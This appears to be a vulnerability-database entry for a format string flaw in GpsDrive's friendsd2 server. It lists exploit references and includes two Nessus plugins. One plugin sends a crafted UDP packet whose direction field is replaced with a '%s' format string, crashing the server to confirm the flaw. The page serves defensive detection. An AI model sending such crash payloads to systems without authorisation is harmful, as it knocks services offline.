Vulnerabilities > CVE-2005-3523 - Unspecified vulnerability in Gpsdrive
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
Format string vulnerability in friendsd2 in GpsDrive allows remote attackers to execute arbitrary code via the dir (direction) field.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Exploit-Db
description gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86). CVE-2005-3523. Remote exploit for linux platform id EDB-ID:1291 last seen 2016-01-31 modified 2005-11-04 published 2005-11-04 reporter Kevin Finisterre source https://www.exploit-db.com/download/1291/ title gpsdrive <= 2.09 friendsd2 Remote Format String Exploit x86 description gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc). CVE-2005-3523. Remote exploit for linux platform id EDB-ID:1290 last seen 2016-01-31 modified 2005-11-04 published 2005-11-04 reporter Kevin Finisterre source https://www.exploit-db.com/download/1290/ title gpsdrive <= 2.09 friendsd2 Remote Format String Exploit ppc
Nessus
NASL family Debian Local Security Checks NASL id DEBIAN_DSA-891.NASL description Kevin Finisterre discovered a format string vulnerability in gpsdrive, a car navigation system, that can lead to the execution of arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 22757 published 2006-10-14 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/22757 title Debian DSA-891-1 : gpsdrive - format string code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-891. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(22757); script_version("1.16"); script_cvs_date("Date: 2019/08/02 13:32:19"); script_cve_id("CVE-2005-3523"); script_xref(name:"DSA", value:"891"); script_name(english:"Debian DSA-891-1 : gpsdrive - format string"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Kevin Finisterre discovered a format string vulnerability in gpsdrive, a car navigation system, that can lead to the execution of arbitrary code." ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2005/dsa-891" ); script_set_attribute( attribute:"solution", value: "Upgrade the gpsdrive package. The old stable distribution (woody) does not contain gpsdrive packages. For the stable distribution (sarge) this problem has been fixed in version 2.09-2sarge1." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:gpsdrive"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1"); script_set_attribute(attribute:"patch_publication_date", value:"2005/11/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/14"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/04"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.1", prefix:"gpsdrive", reference:"2.09-2sarge1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
NASL family Gain a shell remotely NASL id GPSFRIENDS_FRIENDSD_FORMAT_STRING.NASL description The remote host is running a GpsDrive friendsd server, which records the positions of friends on a map. The version of friendsd installed on the remote host is affected by a format string vulnerability. An attacker can leverage this issue using a specially crafted packet to crash the server and possibly execute code on the remote host subject to the privileges under which the server runs. last seen 2020-06-01 modified 2020-06-02 plugin id 20159 published 2005-11-07 reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20159 title GpsDrive friendsd2 dir Field Remote Format String code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20159); script_version("1.20"); script_cvs_date("Date: 2018/07/12 19:01:15"); script_cve_id("CVE-2005-3523"); script_bugtraq_id(15319); script_name(english:"GpsDrive friendsd2 dir Field Remote Format String"); script_summary(english:"Checks for format string vulnerability in GpsDrive friendsd"); script_set_attribute(attribute:"synopsis", value:"The remote server is affected by a format string vulnerability."); script_set_attribute(attribute:"description", value: "The remote host is running a GpsDrive friendsd server, which records the positions of friends on a map. The version of friendsd installed on the remote host is affected by a format string vulnerability. An attacker can leverage this issue using a specially crafted packet to crash the server and possibly execute code on the remote host subject to the privileges under which the server runs."); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dabc8c33"); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?777cc0de"); script_set_attribute(attribute:"solution", value:"Upgrade to 2.10pre3-cvs or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/04"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/11/07"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Gain a shell remotely"); script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc."); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); port = 50123; if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, "UDP"); done = NULL; # A position report. args = make_list( "POS:", # constant => report position rand_str( # a random ID string length:22, charset:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" ), SCRIPT_NAME, # a name "39.187362", # latitude "-76.818423", # longitude unixtime(), # last report (current time) "10", # speed "90", # direction raw_string(0x00) # marks end of packet ); pos = ""; foreach arg (args) { pos += arg + " "; } pos = chomp(pos); # Make sure the server is up. tries = 5; for (iter = 0; iter < tries; iter++) { soc = open_sock_udp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port, "UDP"); # Send our position report. send(socket:soc, data:pos); # Read the response. repeat { res = recv(socket:soc, length:1024); if (isnull(res)) break; # If it's the first line... if (isnull(done)) { # If the first line looks like friendsd, set done=0. if (string("$START:$\n") == res) done = 0; # Otherwise, it's not friendsd so we're done. else { close(soc); exit(0); } } # If it looks like the last line, set done=1. else if (string("$END:$\n") == res) done = 1; } until (done); close(soc); if (done) break; } # We're done if we couldn't get a response after several iterations. if (isnull(done)) exit(0); # Try to crash the server with a bogus position report. exploit = str_replace( string:pos, find:" 90 ", replace:"%s%s%s%s%s%s%s%s%s" ); for (iter = 0; iter < tries; iter++) { soc = open_sock_udp(port); # Send a position report with a format string. send(socket:soc, data:exploit); } sleep(1); # Report a position again to see whether the server is up. for (iter = 0; iter < tries; iter++) { soc = open_sock_udp(port); # Send our position report. send(socket:soc, data:pos); # Read the response. repeat { res = recv(socket:soc, length:1024); if (isnull(res)) break; # If it's the first line... if (isnull(done)) { # If the first line looks like friendsd, set done=0. if (string("$START:$\n") == res) done = 0; # Otherwise, it's not friendsd so we're done. else { close(soc); exit(0); } } # If it looks like the last line, set done=1. else if (string("$END:$\n") == res) done = 1; } until (done); close(soc); if (done) break; } # There's a problem if we couldn't get a response after several iterations. if (isnull(done)) security_hole(port:port, proto:"udp");
References
- http://seclists.org/lists/fulldisclosure/2005/Nov/0130.html
- http://www.debian.org/security/2005/dsa-891
- http://www.securityfocus.com/bid/15319
- http://www.osvdb.org/20531
- http://secunia.com/advisories/17473
- http://secunia.com/advisories/17477
- http://www.novell.com/linux/security/advisories/2005_27_sr.html
- http://www.vupen.com/english/advisories/2005/2307
- http://www.securityfocus.com/archive/1/415788/30/0/threaded
- http://www.digitalmunition.com/DMA%5B2005-1104a%5D.txt